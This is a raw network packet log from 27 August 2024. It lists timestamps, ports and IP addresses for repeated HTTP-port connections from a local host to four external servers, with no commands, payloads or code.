Aug 27, 2024 17:49:25.365375042 CEST	49845	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:26.761862993 CEST	49845	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:26.864057064 CEST	80	49845	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:27.779484034 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:27.880153894 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:27.880407095 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:27.889471054 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:27.889492035 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:27.889539003 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:27.990212917 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:27.990223885 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:27.990231991 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:27.990413904 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:27.990425110 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:27.990492105 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:27.990523100 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:27.990535021 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:27.990632057 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:27.990642071 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:27.990649939 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:27.990663052 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:27.990858078 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:27.991003036 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:27.991734028 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:27.992086887 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:28.091583014 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.091639042 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.091665983 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.091690063 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.091738939 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.091766119 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.091774940 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:28.091809034 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.091873884 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.091902018 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.091926098 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.091944933 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:28.091993093 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:28.092102051 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.092149019 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.092154980 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:28.092241049 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.092273951 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.092298985 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.092340946 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.092372894 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.092400074 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.092502117 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.092674017 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.192739964 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.192967892 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.193120956 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.193217993 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.193424940 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.193437099 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.193479061 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.193603992 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.193730116 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.193739891 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.193849087 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:28.194024086 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:29.401879072 CEST	49846	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:29.503058910 CEST	80	49846	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:30.419699907 CEST	49847	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:30.520313025 CEST	80	49847	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:30.520522118 CEST	49847	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:30.525892973 CEST	49847	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:30.626398087 CEST	80	49847	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:30.628740072 CEST	80	49847	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:30.628840923 CEST	80	49847	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:30.629004002 CEST	49847	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:30.631046057 CEST	49847	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:30.638122082 CEST	80	49847	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:30.638283968 CEST	49847	80	192.168.11.20	3.33.130.190
Aug 27, 2024 17:49:30.731570959 CEST	80	49847	3.33.130.190	192.168.11.20
Aug 27, 2024 17:49:35.749623060 CEST	49848	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:35.850065947 CEST	80	49848	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:35.850235939 CEST	49848	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:35.858144999 CEST	49848	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:35.961061954 CEST	80	49848	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:35.962555885 CEST	80	49848	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:35.962642908 CEST	80	49848	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:35.962654114 CEST	80	49848	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:35.962800026 CEST	49848	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:35.970165968 CEST	80	49848	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:35.970274925 CEST	49848	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:37.368858099 CEST	49848	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:38.386768103 CEST	49849	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:38.487493992 CEST	80	49849	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:38.487663031 CEST	49849	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:38.497517109 CEST	49849	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:38.598434925 CEST	80	49849	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:38.600132942 CEST	80	49849	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:38.600251913 CEST	80	49849	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:38.600271940 CEST	80	49849	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:38.600560904 CEST	49849	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:38.606745958 CEST	80	49849	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:38.606965065 CEST	49849	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:40.008898973 CEST	49849	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.026520967 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.127089024 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.127268076 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.136535883 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.136585951 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.136635065 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.237201929 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.237301111 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.237365961 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.237415075 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.237464905 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.237477064 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.237495899 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.237504959 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.237514973 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.237687111 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.237698078 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.237705946 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.237826109 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.237828016 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.237993956 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.338880062 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.338967085 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.338977098 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339080095 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.339082003 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339092970 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339129925 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.339176893 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.339202881 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339214087 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339338064 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339345932 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339349031 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.339355946 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339421034 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339517117 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.339586020 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339596987 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339605093 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339612007 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339620113 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339654922 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339807987 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339818954 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.339904070 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.439821005 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.439920902 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.439932108 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.440046072 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.440057039 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.440283060 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.440375090 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.440383911 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.440498114 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.440624952 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.440634012 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.440640926 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.442161083 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.442276001 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.442301989 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.442414999 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:41.446065903 CEST	80	49850	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:41.446217060 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:42.648952961 CEST	49850	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:43.666846037 CEST	49851	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:43.767580986 CEST	80	49851	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:43.767786980 CEST	49851	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:43.773133993 CEST	49851	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:43.873790026 CEST	80	49851	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:43.875366926 CEST	80	49851	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:43.875493050 CEST	80	49851	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:43.875544071 CEST	80	49851	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:43.875793934 CEST	49851	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:43.877947092 CEST	49851	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:43.884332895 CEST	80	49851	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:43.884439945 CEST	49851	80	192.168.11.20	199.59.243.226
Aug 27, 2024 17:49:43.978441954 CEST	80	49851	199.59.243.226	192.168.11.20
Aug 27, 2024 17:49:57.101111889 CEST	49852	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:49:57.409524918 CEST	80	49852	154.23.184.218	192.168.11.20
Aug 27, 2024 17:49:57.409666061 CEST	49852	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:49:57.417598963 CEST	49852	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:49:57.725992918 CEST	80	49852	154.23.184.218	192.168.11.20
Aug 27, 2024 17:49:57.726274014 CEST	80	49852	154.23.184.218	192.168.11.20
Aug 27, 2024 17:49:57.726489067 CEST	49852	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:49:58.926557064 CEST	49852	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:49:59.944192886 CEST	49853	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:00.267152071 CEST	80	49853	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:00.267276049 CEST	49853	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:00.275250912 CEST	49853	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:00.598366022 CEST	80	49853	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:00.598558903 CEST	80	49853	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:00.598769903 CEST	49853	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:01.785337925 CEST	49853	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:02.803314924 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.133058071 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.133196115 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.142137051 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.142180920 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.142230034 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.471924067 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.472071886 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.472155094 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.472477913 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.472548962 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.472784996 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.472871065 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.472877979 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.473087072 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.473258972 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.802067041 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.802200079 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.802228928 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.802469015 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.802529097 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.802635908 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.802747011 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.802921057 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:03.802926064 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.803698063 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.803822041 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.803837061 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.803926945 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.804078102 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:03.804356098 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:04.132272005 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:04.132563114 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:04.132786989 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:04.132956028 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:04.133172989 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:04.133299112 CEST	80	49854	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:04.133414030 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:04.644007921 CEST	49854	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:05.661694050 CEST	49855	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:05.963258028 CEST	80	49855	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:05.963463068 CEST	49855	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:05.969963074 CEST	49855	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:06.271472931 CEST	80	49855	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:06.271667957 CEST	80	49855	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:06.272021055 CEST	49855	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:06.274034977 CEST	49855	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:50:06.575480938 CEST	80	49855	154.23.184.218	192.168.11.20
Aug 27, 2024 17:50:11.285479069 CEST	49856	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:11.386543036 CEST	80	49856	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:11.386671066 CEST	49856	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:11.394592047 CEST	49856	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:11.508402109 CEST	80	49856	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:11.511146069 CEST	80	49856	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:11.511466026 CEST	49856	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:12.907844067 CEST	49856	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:13.009370089 CEST	80	49856	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:13.925879002 CEST	49857	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:14.026407003 CEST	80	49857	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:14.026552916 CEST	49857	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:14.034516096 CEST	49857	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:14.136373043 CEST	80	49857	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:14.138823032 CEST	80	49857	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:14.139127970 CEST	49857	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:15.547929049 CEST	49857	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:15.648403883 CEST	80	49857	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.565532923 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.666342020 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.666573048 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.675647020 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.675700903 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.675751925 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.776510000 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.776673079 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.776730061 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.776783943 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.776817083 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.776899099 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.776909113 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.776931047 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.776999950 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.777064085 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.777158022 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.777195930 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.777205944 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.777215004 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.777499914 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.778770924 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.778914928 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.877892017 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.877980947 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.877990961 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.878072977 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.878113031 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.878160954 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.878212929 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.878329039 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.878338099 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.878346920 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.878381014 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.878418922 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.878576994 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.878670931 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.878679991 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.878720999 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.878784895 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.878832102 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.878890038 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:16.878923893 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.879169941 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.879179001 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.879292965 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.879302025 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.879415989 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.879585028 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.979407072 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.979512930 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.979523897 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.979635954 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.979646921 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.979655027 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.979763985 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.979877949 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.980031967 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.980045080 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.980052948 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:16.980130911 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:18.187954903 CEST	49858	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:18.288736105 CEST	80	49858	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:19.205724955 CEST	49859	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:19.319870949 CEST	80	49859	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:19.320000887 CEST	49859	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:19.325340033 CEST	49859	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:19.426033020 CEST	80	49859	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:19.428704023 CEST	80	49859	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:19.428730011 CEST	80	49859	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:19.428942919 CEST	49859	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:19.430999994 CEST	49859	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:50:19.432784081 CEST	80	49859	76.223.67.189	192.168.11.20
Aug 27, 2024 17:50:19.432938099 CEST	49859	80	192.168.11.20	76.223.67.189
